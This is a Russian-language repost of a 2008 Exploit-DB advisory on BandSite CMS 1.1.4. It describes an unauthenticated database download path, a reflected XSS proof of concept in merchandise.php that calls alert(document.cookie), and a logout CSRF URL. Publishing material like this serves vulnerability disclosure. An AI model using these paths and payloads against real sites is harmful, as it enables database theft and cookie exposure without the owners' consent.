- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6286
- Проверка EDB
-
- Пройдено
- Автор
- SIRGOD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-7058 cve-2008-7057 cve-2008-7056
- Дата публикации
- 2008-08-21
Код:
###########################################################################
[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN
###########################################################################
[+] Arbitrary Download Database
Go to
http://localhost/[Path]/adminpanel/phpmydump.php
and the download will begin ( database.sql ) .
[+] Cross Site Scripting
http://localhost/[Path]/merchandise.php?type=[XSS]
http://localhost/[Path]/merchandise.php?type=<script>alert(document.cookie)</script>
[+] Cross Site Request Forgery
If a logged in user with administrator privilegies click the following url he will be logged out.
http://localhost/[Path]/adminpanel/logout.php
###########################################################################
# milw0rm.com [2008-08-21]- Источник
- www.exploit-db.com
